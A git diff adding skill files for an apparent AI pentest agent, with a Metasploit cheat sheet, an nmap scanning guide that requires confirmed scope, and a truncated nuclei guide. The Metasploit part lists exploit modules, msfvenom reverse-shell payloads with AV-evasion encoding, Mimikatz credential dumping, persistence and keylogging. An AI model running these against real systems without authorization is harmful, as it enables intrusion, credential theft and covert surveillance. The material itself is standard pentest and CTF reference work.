  284. package/skills/offensive/airecon-fork/reconnaissance-asn-whois-osint/SKILL.md +236 -0
  285. package/skills/offensive/airecon-fork/reconnaissance-ctf-methodology/SKILL.md +435 -0
  286. package/skills/offensive/airecon-fork/reconnaissance-dorking/SKILL.md +182 -0
  287. package/skills/offensive/airecon-fork/reconnaissance-exposed-devtools-detection/SKILL.md +513 -0
  288. package/skills/offensive/airecon-fork/reconnaissance-full-recon/SKILL.md +305 -0
  289. package/skills/offensive/airecon-fork/reconnaissance-internal-pentest/SKILL.md +202 -0
  290. package/skills/offensive/airecon-fork/reconnaissance-javascript-analysis/SKILL.md +167 -0
  291. package/skills/offensive/airecon-fork/reconnaissance-js-internal-hostname-intelligence/SKILL.md +391 -0
  292. package/skills/offensive/airecon-fork/reconnaissance-monitoring-secrets-exposure/SKILL.md +394 -0
  293. package/skills/offensive/airecon-fork/reconnaissance-shodan-censys/SKILL.md +279 -0
  294. package/skills/offensive/airecon-fork/reconnaissance-subdomain-enum/SKILL.md +952 -0
  295. package/skills/offensive/airecon-fork/technologies-cicd-attacks/SKILL.md +283 -0
  296. package/skills/offensive/airecon-fork/technologies-cloud-security/SKILL.md +299 -0
  297. package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
  298. package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
  299. package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
  300. package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
  301. package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
  302. package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
  303. package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
  304. package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
  305. package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
  306. package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
  307. package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
  308. package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
  309. package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
  310. package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
  311. package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
  312. package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
  313. package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
  314. package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
  315. package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
  316. package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
  317. package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
  318. package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
  319. package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
  320. package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
  321. package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
  322. package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
  323. package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
  324. package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
  325. package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
  326. package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
  327. package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
  328. package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
  329. package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
  330. package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
  331. package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
  332. package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
  333. package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
  334. package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
  335. package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
  336. package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
  337. package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
  338. package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
  339. package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
  340. package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
  341. package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
  342. package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
  343. package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
  344. package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
  345. package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
  346. package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
  347. package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
  348. package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
  349. package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
  350. package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
  351. package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
  352. package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
  353. package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
  354. package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
  355. package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
  356. package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
  357. package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
  358. package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
  359. package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
  360. package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
  361. package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
  362. package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
  363. package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
  364. package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
  365. package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
  366. package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
  367. package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
  368. package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
  369. package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
  370. package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
  371. package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
  372. package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
  373. package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
  374. package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
  375. package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
  376. package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
  377. package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
  378. package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
  379. package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
  380. package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
  381. package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
  382. package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
  383. package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
  384. package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
  385. package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
  386. package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
@@ -0,0 +1,270 @@
1
+ <!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
2
+
3
+ ---
4
+ name: metasploit
5
+ description: Metasploit Framework — module selection, msfconsole workflow, msfvenom payload generation, handlers, meterpreter post-exploitation, and common exploit modules for pentest/CTF
6
+ ---
7
+
8
+ # Metasploit Framework
9
+
10
+ Metasploit = exploitation framework with 2000+ modules. Use for: exploit delivery, payload generation (msfvenom), reverse shell management, and post-exploitation via Meterpreter.
11
+
12
+ **Install:**
13
+ ```
14
+ sudo apt-get install -y metasploit-framework
15
+ # Start DB (required for search to work fast):
16
+ sudo systemctl start postgresql
17
+ sudo msfdb init
18
+ ```
19
+
20
+ ---
21
+
22
+ ## msfconsole Basics
23
+
24
+ # Start:
25
+ msfconsole
26
+ msfconsole -q # Quiet mode (no banner)
27
+
28
+ # Basic commands:
29
+ search <keyword> # Find modules: search ms17-010, search eternalblue
30
+ search type:exploit name:tomcat
31
+ search cve:2021-44228
32
+
33
+ use <module_path> # Load module: use exploit/windows/smb/ms17_010_eternalblue
34
+ info # Show module details + all options
35
+ show options # Show required/optional options
36
+ show payloads # List compatible payloads for current module
37
+ show targets # List target OS/arch options
38
+
39
+ set RHOSTS <target_ip> # Set target
40
+ set RPORT <port> # Set target port
41
+ set LHOST <attacker_ip> # Set local IP for reverse shell
42
+ set LPORT 4444 # Set listener port
43
+ set PAYLOAD <payload> # Set payload (e.g., windows/x64/meterpreter/reverse_tcp)
44
+
45
+ check # Check if target is vulnerable (if module supports it)
46
+ run # Execute module
47
+ exploit # Same as run
48
+
49
+ # Session management:
50
+ sessions -l # List active sessions
51
+ sessions -i 1 # Interact with session 1
52
+ background # Background current session (Ctrl+Z also works)
53
+ sessions -k 1 # Kill session 1
54
+
55
+ ---
56
+
57
+ ## Common Exploit Modules
58
+
59
+ ### Windows
60
+
61
+ # EternalBlue — MS17-010 (Windows 7/2008):
62
+ use exploit/windows/smb/ms17_010_eternalblue
63
+ set RHOSTS <target>
64
+ set PAYLOAD windows/x64/meterpreter/reverse_tcp
65
+ set LHOST <attacker>
66
+ run
67
+
68
+ # PrintNightmare — CVE-2021-1675:
69
+ use exploit/windows/dcerpc/cve_2021_1675_printspooler
70
+ set RHOSTS <target>
71
+ set LHOST <attacker>
72
+ run
73
+
74
+ # Rejetto HFS — CVE-2014-6287:
75
+ use exploit/windows/http/rejetto_hfs_exec
76
+ set RHOSTS <target>
77
+ set RPORT 80
78
+ run
79
+
80
+ # ZeroLogon — CVE-2020-1472:
81
+ use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
82
+ set RHOSTS <dc_ip>
83
+ set NBNAME <domain_controller_name>
84
+ run
85
+
86
+ ### Web
87
+
88
+ # Apache Struts — S2-045:
89
+ use exploit/multi/http/struts2_content_type_ognl
90
+ set RHOSTS <target>
91
+ set RPORT 8080
92
+ set LHOST <attacker>
93
+ run
94
+
95
+ # Tomcat Manager WAR upload:
96
+ use exploit/multi/http/tomcat_mgr_upload
97
+ set RHOSTS <target>
98
+ set HttpUsername tomcat
99
+ set HttpPassword tomcat
100
+ set LHOST <attacker>
101
+ run
102
+
103
+ # PHP CGI argument injection:
104
+ use exploit/multi/http/php_cgi_arg_injection
105
+ set RHOSTS <target>
106
+ run
107
+
108
+ # Jenkins Script Console RCE:
109
+ use exploit/multi/http/jenkins_script_console
110
+ set RHOSTS <target>
111
+ set LHOST <attacker>
112
+ run
113
+
114
+ ### Linux
115
+
116
+ # vsftpd 2.3.4 backdoor:
117
+ use exploit/unix/ftp/vsftpd_234_backdoor
118
+ set RHOSTS <target>
119
+ run
120
+
121
+ # Shellshock:
122
+ use exploit/multi/http/apache_mod_cgi_bash_env_exec
123
+ set RHOSTS <target>
124
+ set TARGETURI /cgi-bin/vulnerable.cgi
125
+ run
126
+
127
+ ### Post-Exploitation
128
+
129
+ # Dump credentials:
130
+ use post/windows/gather/credentials/credential_collector
131
+ use post/multi/recon/local_exploit_suggester
132
+
133
+ # Hashdump:
134
+ use post/windows/gather/hashdump
135
+
136
+ ---
137
+
138
+ ## Handlers — Receiving Reverse Shells
139
+
140
+ # Multi-handler (generic reverse shell listener):
141
+ use exploit/multi/handler
142
+ set PAYLOAD windows/x64/meterpreter/reverse_tcp
143
+ set LHOST <attacker>
144
+ set LPORT 4444
145
+ set ExitOnSession false # Keep handler running after session
146
+ run -j # Run as background job
147
+
148
+ # Also accepts non-meterpreter shells:
149
+ set PAYLOAD linux/x64/shell/reverse_tcp
150
+
151
+ ---
152
+
153
+ ## msfvenom — Payload Generation
154
+
155
+ # List all payloads:
156
+ msfvenom -l payloads | grep "windows/x64"
157
+ msfvenom -l payloads | grep "linux/x64"
158
+
159
+ # Windows x64 reverse TCP meterpreter:
160
+ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell.exe
161
+
162
+ # Windows x86 (32-bit):
163
+ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell32.exe
164
+
165
+ # Linux ELF:
166
+ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f elf -o shell.elf
167
+ chmod +x shell.elf
168
+
169
+ # PHP webshell:
170
+ msfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.php
171
+
172
+ # Python:
173
+ msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.py
174
+
175
+ # WAR (Tomcat):
176
+ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f war -o shell.war
177
+
178
+ # PowerShell one-liner:
179
+ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f psh-cmd
180
+
181
+ # Base64-encoded:
182
+ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe | base64
183
+
184
+ # With encoder (basic AV evasion):
185
+ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 \
186
+ -e x64/xor_dynamic -i 3 -f exe -o shell_encoded.exe
187
+
188
+ ---
189
+
190
+ ## Meterpreter Commands
191
+
192
+ # System info:
193
+ sysinfo # OS + hostname + arch
194
+ getuid # Current user
195
+ getpid # Current process ID
196
+ ps # Process list
197
+
198
+ # Privilege escalation:
199
+ getsystem # Auto privesc attempt (several techniques)
200
+ getprivs # List privileges
201
+ migrate <pid> # Migrate to another process (e.g., explorer.exe)
202
+
203
+ # File operations:
204
+ ls # List directory
205
+ cd C:\\Users
206
+ pwd
207
+ download C:\\Users\\admin\\Desktop\\flag.txt /home/kali/
208
+ upload /home/kali/tool.exe C:\\Temp\\tool.exe
209
+
210
+ # Shell:
211
+ shell # Drop to cmd.exe shell
212
+ # Ctrl+Z = background shell back to meterpreter
213
+
214
+ # Credential extraction:
215
+ hashdump # Dump local SAM hashes
216
+ run post/windows/gather/credentials/credential_collector
217
+ load kiwi # Load Mimikatz module
218
+ creds_all # Dump all credentials via Kiwi/Mimikatz
219
+
220
+ # Networking:
221
+ ipconfig # Network interfaces
222
+ route # Routing table
223
+ portfwd add -l 3306 -p 3306 -r <internal_host> # Port forward
224
+ run auxiliary/server/socks4a # SOCKS proxy through session
225
+
226
+ # Persistence:
227
+ run persistence -S -U -X -i 5 -p 4444 -r <attacker>
228
+ # -S = startup, -U = user login, -X = system boot
229
+
230
+ # Screenshots / keylogger:
231
+ screenshot # Take screenshot
232
+ keyscan_start # Start keylogger
233
+ keyscan_dump # Dump keystrokes
234
+ keyscan_stop
235
+
236
+ ---
237
+
238
+ ## Auxiliary Modules (Scanners)
239
+
240
+ # SMB version scan:
241
+ use auxiliary/scanner/smb/smb_version
242
+ set RHOSTS 10.10.10.0/24
243
+ run
244
+
245
+ # HTTP version:
246
+ use auxiliary/scanner/http/http_version
247
+ set RHOSTS 10.10.10.0/24
248
+ run
249
+
250
+ # Credential brute force:
251
+ use auxiliary/scanner/ssh/ssh_login
252
+ set RHOSTS <target>
253
+ set USER_FILE users.txt
254
+ set PASS_FILE passwords.txt
255
+ run
256
+
257
+ ---
258
+
259
+ ## Pro Tips
260
+
261
+ 1. `search cve:XXXX-XXXXX` → fastest way to find module for a known CVE
262
+ 2. Always `set ExitOnSession false` on handler → keeps listening after first connection
263
+ 3. `migrate` to stable process (explorer.exe, svchost.exe) immediately after meterpreter session
264
+ 4. `load kiwi` + `creds_all` = Mimikatz in memory without writing to disk
265
+ 5. `run local_exploit_suggester` in meterpreter → automatic privesc enumeration
266
+ 6. `portfwd` in meterpreter = port forwarding through session without extra tools
267
+
268
+ ## Summary
269
+
270
+ Metasploit workflow: `msfconsole` → `search` CVE/service → `use` module → `set RHOSTS/LHOST/PAYLOAD` → `check` → `run` → meterpreter: `getsystem`, `hashdump`, `load kiwi`. msfvenom: generate standalone payloads for any format (exe, elf, war, php). Multi/handler = always-on reverse shell catcher for any payload.
@@ -0,0 +1,211 @@
1
+ <!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
2
+
3
+ # nmap & naabu — Usage Guide for AIRecon
4
+
5
+ nmap and naabu are port scanners and service fingerprinters. They are infrastructure-level tools
6
+ that answer "what is listening on this host?" — not "what vulnerability exists here?" Understanding
7
+ the distinction is critical. Port scan results are raw data that require manual interpretation and
8
+ correlation before any further action is taken.
9
+
10
+ ---
11
+
12
+ ## MANDATORY PRE-CONDITIONS (All must be true before using nmap or naabu)
13
+
14
+ [ ] You have confirmed the target is within scope — IP, hostname, or CIDR explicitly authorized.
15
+ [ ] For domain-based targets: DNS resolution has been performed and you are scanning the IP,
16
+ not passing a domain name to masscan (masscan requires IP addresses only).
17
+ [ ] You have a specific reason to port scan this host — what are you trying to learn?
18
+ State it: "I am scanning to determine if port 8080 is open because the JS referenced
19
+ an internal API on that port" — NOT "I am scanning because it is the next step."
20
+ [ ] output/host_profiles.json either has an entry for this host already, or you are creating
21
+ the entry — port scan results must be written into the host profile immediately after.
22
+
23
+ Port scanning without a stated purpose is reconnaissance noise, not intelligence.
24
+
25
+ ---
26
+
27
+ ## What Port Scanning Tells You (and What It Does Not)
28
+
29
+ WHAT IT TELLS YOU:
30
+ - Which TCP/UDP ports are open (accepting connections)
31
+ - Service banners and version strings (with -sV)
32
+ - Operating system fingerprint (with -O, requires root)
33
+ - Response behavior under different probe types
34
+
35
+ WHAT IT DOES NOT TELL YOU:
36
+ - Whether a web application on port 8080 is vulnerable
37
+ - Whether a service is exploitable
38
+ - What the business logic of an application is
39
+ - Anything about authentication, authorization, or input handling
40
+
41
+ A port scan result is the BEGINNING of investigation for each discovered service.
42
+ It is not a vulnerability finding. It is not a reason to run an exploit scanner.
43
+ Every open port requires manual investigation: what is running? what version? what does it do?
44
+
45
+ ---
46
+
47
+ ## Scan Types and When to Use Each
48
+
49
+ REACHABILITY CHECK (before host profile — lightweight):
50
+ Purpose: Quickly confirm which hosts are alive before heavier enumeration.
51
+ Use: At the start, before manual profiling, to prioritize which hosts to investigate.
52
+ Command pattern: ping sweep or fast TCP check on common ports only.
53
+ Output: Feed into host prioritization — NOT into automated scanners.
54
+
55
+ TOP PORTS SCAN (during host profiling):
56
+ Purpose: Understand the service landscape of a specific host you are manually profiling.
57
+ Use: As part of STEP 3 manual profiling — one scan per host, recorded in host_profiles.json.
58
+ Prerequisite: You are actively profiling this host, not bulk-scanning a list.
59
+ Command pattern: top 1000 ports, version detection, default scripts on confirmed live host.
60
+
61
+ TARGETED SERVICE SCAN (after finding a specific open port):
62
+ Purpose: Deep fingerprint a specific service already discovered on a specific port.
63
+ Use: When a port is open and you want version, OS, and NSE script output for that service.
64
+ Prerequisite: The port was already found in a previous scan. You are now going deeper.
65
+ Command pattern: single port, full version detection, relevant NSE scripts only.
66
+
67
+ FULL PORT SCAN (when top ports reveal nothing interesting):
68
+ Purpose: Check all 65535 ports for unusual services on non-standard ports.
69
+ Use: Only after top port scan finds nothing interesting and you have a specific reason to
70
+ believe non-standard ports are in use (e.g., JS references to :4000, :9000, :15000).
71
+ Command pattern: full range, SYN scan, lower speed to avoid detection.
72
+
73
+ UDP SCAN (specific service investigation only):
74
+ Purpose: Detect UDP services like DNS, SNMP, NTP, TFTP.
75
+ Use: Only when you have a specific hypothesis about a UDP service.
76
+ Prerequisite: Root privileges required. Slow — do not run against all hosts.
77
+
78
+ ---
79
+
80
+ ## TWO-PASS SCANNING WORKFLOW (preferred — do not skip pass 1)
81
+
82
+ The two-pass approach avoids running -sV on all ports (slow + noisy) by first finding open ports,
83
+ then running service detection ONLY on those ports. Always prefer this over a single full scan.
84
+
85
+ PASS 1 — Discovery (fast, finds open ports):
86
+ nmap -n -Pn --top-ports 100 --open -T4 --max-retries 1 --host-timeout 90s -oN output/nmap_quick.txt <host>
87
+ Extract open ports: grep "^[0-9]" output/nmap_quick.txt | cut -d/ -f1 | paste -sd,
88
+
89
+ PASS 2 — Enrichment (service detection on discovered ports only):
90
+ nmap -n -Pn -sV -sC -p <comma_ports_from_pass1> --script-timeout 30s --host-timeout 3m -oN output/nmap_services.txt <host>
91
+
92
+ No-root fallback (when SYN scan not available):
93
+ nmap -n -Pn -sT --top-ports 100 --open --host-timeout 90s <host>
94
+
95
+ Prefer naabu for broad initial port discovery (faster):
96
+ naabu -host <host> -top-ports 1000 -silent -o output/ports.txt
97
+ Then feed to nmap enrichment: nmap -n -Pn -sV -sC -p $(cat output/ports.txt | grep -oP ':\K\d+' | paste -sd,) <host>
98
+
99
+ ---
100
+
101
+ ## Usage Patterns
102
+
103
+ Standard host profile scan (top ports, version detection):
104
+ sudo nmap -sS -sV -sC --open -p- --min-rate 1000 <host> -oA output/nmap_<host>
105
+
106
+ Fast top-1000 ports (for initial host profiling):
107
+ sudo nmap -sS --open --top-ports 1000 <host> -oN output/nmap_quick_<host>.txt
108
+
109
+ Targeted single-port deep scan (after discovering an interesting port):
110
+ sudo nmap -sV -sC -p <port> <host> --script=<relevant_script> -oN output/nmap_port<port>_<host>.txt
111
+
112
+ Full port range (only when specifically justified):
113
+ sudo nmap -sS -p- --min-rate 5000 <host> -oN output/nmap_fullports_<host>.txt
114
+
115
+ Light reachability check across resolved hosts (before profiling):
116
+ naabu -l output/resolved.txt -top-ports 1000 -o output/ports_naabu.txt
117
+
118
+ UDP scan for specific services (requires strong justification):
119
+ sudo nmap -sU -p 53,161,123,69 <host> -oN output/nmap_udp_<host>.txt
120
+
121
+ nrich — passive IP enrichment (no API key, uses Shodan InternetDB):
122
+ # After collecting IPs, enrich with known ports/CVEs/tags from Shodan InternetDB:
123
+ cat output/live_ips.txt | nrich - # Enrich all IPs
124
+ echo "1.2.3.4" | nrich - # Single IP
125
+ cat output/live_ips.txt | nrich - -json > output/nrich_results.json
126
+
127
+ # nrich returns per-IP: open_ports, cves, cpes, tags (no active scan — purely passive lookup)
128
+ # Perfect complement to nmap: use nrich BEFORE active scan to pre-check known exposure
129
+ # Install: go install github.com/projectdiscovery/nrich/cmd/nrich@latest
130
+
131
+ NEVER use these patterns:
132
+ nmap -iL output/live_hosts.txt -A (aggressive scan on unknown list, no purpose stated)
133
+ nmap <IP> -sV --script=vuln (vuln script category = automated spray, banned)
134
+ masscan output/live_hosts.txt (masscan requires IPs, not hostnames)
135
+
136
+ NSE SCRIPTS — USE SELECTIVELY:
137
+ Default scripts (-sC) are acceptable during host profiling.
138
+ The "vuln" script category is FORBIDDEN — it is equivalent to running an automated vuln scanner.
139
+ Select specific NSE scripts only when you have a hypothesis about a specific service.
140
+ Example: if you found Apache Struts, use --script=http-struts2-* NOT --script=vuln.
141
+
142
+ ---
143
+
144
+ ## Interpreting Results — Mandatory Steps After Every Scan
145
+
146
+ After nmap or naabu completes, for EVERY open port found:
147
+
148
+ STEP 1: Identify the service running on that port.
149
+ Do NOT trust the service label alone. Banner says "Apache httpd" — visit it in the browser.
150
+ Banner says "OpenSSH 7.4" — note the version, look up its CVE history, but do NOT auto-exploit.
151
+
152
+ STEP 2: Manually investigate the service.
153
+ For web ports (80, 443, 8080, 8443, 3000, 4000, 5000, etc.):
154
+ → browser_action: visit the port, view source, observe the application.
155
+ For non-web ports (SSH, FTP, SMTP, Redis, MongoDB, etc.):
156
+ → Manual banner grab: nc -v <host> <port> or curl telnet://<host>:<port>
157
+ → Identify: is this expected? is it exposed unintentionally? is it authenticated?
158
+
159
+ STEP 3: Record in host_profiles.json.
160
+ For each open port: { "port": N, "service": "...", "version": "...", "notes": "..." }
161
+ Document what you manually observed, not just what nmap guessed.
162
+
163
+ STEP 4: Form a hypothesis before taking further action.
164
+ "Port 6379 is open and appears to be Redis — is it authenticated? I will test with redis-cli."
165
+ "Port 9200 is open and appears to be Elasticsearch — is the API exposed without auth?"
166
+ DO NOT: "Port 9200 is open, run nuclei against it." — this is the forbidden pattern.
167
+
168
+ STEP 5: Manually verify the hypothesis.
169
+ Before using any automated scanner against a discovered service, manually confirm:
170
+ - Is it actually that service? (version banner, behavior)
171
+ - Is it the expected configuration or an anomaly?
172
+ - Is there a specific, plausible vulnerability for this version that warrants testing?
173
+
174
+ ---
175
+
176
+ ## Version Information — The Correct Follow-Up Workflow
177
+
178
+ When nmap returns a specific version (e.g., "Apache Tomcat 9.0.35"):
179
+
180
+ DO:
181
+ 1. Note the exact version string.
182
+ 2. Manually search for known CVEs: web_search "Apache Tomcat 9.0.35 CVE"
183
+ 3. Read the CVE description — understand what the vulnerability actually is.
184
+ 4. Determine: is this application's usage pattern consistent with the vulnerable code path?
185
+ 5. If yes: manually craft a targeted test or use a specific CVE template (not a generic scan).
186
+
187
+ DO NOT:
188
+ → Run a generic "vuln" NSE script category against it.
189
+ → Load the host into a vulnerability scanner "to check for CVEs."
190
+ → Assume the version is vulnerable without reading the CVE conditions.
191
+
192
+ ---
193
+
194
+ ## Workflow Integration (Where nmap/naabu Fit)
195
+
196
+ Phase 1 STEP 2 (Live Host Detection):
197
+ naabu or light nmap for reachability and common port check across resolved hosts.
198
+ Output: feeds into host prioritization — NOT into scanners.
199
+
200
+ Phase 1 STEP 3 (Manual Profiling):
201
+ Full port scan of each specific host being profiled (one at a time).
202
+ Output: recorded directly into output/host_profiles.json for that host.
203
+
204
+ Phase 2+ (Targeted Service Investigation):
205
+ Single-port deep scans on specific interesting services discovered during profiling.
206
+ Always followed by manual investigation of the discovered service.
207
+
208
+ NEVER:
209
+ Scan a list of hosts in bulk and immediately pipe results into a vulnerability scanner.
210
+ Use the "vuln" NSE script category at any phase.
211
+ Treat scan results as findings — they are starting points for manual investigation.
@@ -0,0 +1,175 @@
1
+ <!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
2
+
3
+ # Nuclei — Usage Guide for AIRecon
4
+
5
+ Nuclei is a template-based vulnerability scanner. It is powerful ONLY when used with the right
6
+ context. Without knowing the target's tech stack and input surface first, nuclei produces noise —
7
+ not findings. Treat it as a precision instrument, not a spray can.
8
+
9
+ ---
10
+
11
+ ## DECIDE FIRST: Full Recon vs Specific Task
12
+
13
+ Read the user's request and apply the correct mode:
14
+
15
+ [FULL RECON] — "recon target.com", "full pentest", "bug bounty recon"
16
+ → All 5 pre-conditions below MUST be satisfied before nuclei.
17
+ → Do not shortcut. Gate is strict.
18
+
19
+ [SPECIFIC TASK] — "scan this endpoint for CVEs", "check if nginx version X is vulnerable",
20
+ "test this URL for misconfigs", "I already know it's WordPress 5.9"
21
+ → Use the SPECIFIC TASK FAST PATH below.
22
+ → Skip host_profiles.json requirement if you have gathered equivalent info in this session.
23
+
24
+ ---
25
+
26
+ ## SPECIFIC TASK FAST PATH (for targeted, scoped nuclei use)
27
+
28
+ When the user gives you a specific host + specific technology or vulnerability class:
29
+
30
+ You MAY run nuclei immediately if ALL of these are true:
31
+ [x] You know the exact target URL (not a list of unknowns)
32
+ [x] You know what technology/framework is running (from user, from curl headers, from JS)
33
+ [x] You have a specific template category or CVE ID in mind — NOT the entire template library
34
+ [x] You are NOT doing bulk scanning (no -l with unexamined host lists)
35
+
36
+ Example legitimate fast-path use:
37
+ User: "check if login.target.com Grafana is vulnerable to CVE-2021-43798"
38
+ → nuclei -u https://login.target.com -id CVE-2021-43798 -o output/nuclei_grafana_cve.txt
39
+ → No host_profiles.json required. No phase gate. Run immediately.
40
+
41
+ User: "I found /actuator/env exposed, check for Spring misconfigs"
42
+ → nuclei -u https://target.com/actuator -t http/misconfiguration/springboot.yaml
43
+ → Fine. You already have the endpoint from manual finding.
44
+
45
+ STILL FORBIDDEN even in specific task mode:
46
